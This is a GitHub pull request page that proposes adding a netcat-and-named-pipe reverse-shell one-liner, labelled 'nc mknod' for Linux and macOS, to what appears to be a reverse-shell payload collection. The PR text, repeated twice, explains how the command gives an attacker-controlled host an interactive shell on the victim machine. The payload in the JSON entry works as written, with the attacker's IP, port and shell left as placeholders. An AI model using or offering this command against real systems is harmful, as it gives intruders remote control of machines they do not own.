Skip to content

Conversation

ghost-ng
Copy link

@ghost-ng ghost-ng commented Jun 28, 2025

{
        "name": "nc mknod",
        "command": "cd /tmp;rm -f x; mknod x p && nc {ip} {port} 0<x | {shell} 1>x",
        "meta": ["linux", "mac"]
},	    

This one-liner sets up a fully interactive reverse shell by creating a named pipe in a temporary directory, then using Netcat to connect back to an attacker-controlled host. It connects Netcat’s input and output through the named pipe so that commands sent by the attacker are executed by the chosen shell, and the results are sent back, creating a bi-directional shell.

This one-liner sets up a fully interactive reverse shell by creating a named pipe in a temporary directory, then using Netcat to connect back to an attacker-controlled host. It connects Netcat’s input and output through the named pipe so that commands sent by the attacker are executed by the chosen shell, and the results are sent back, creating a bi-directional shell.
@ghost-ng ghost-ng mentioned this pull request Jul 7, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant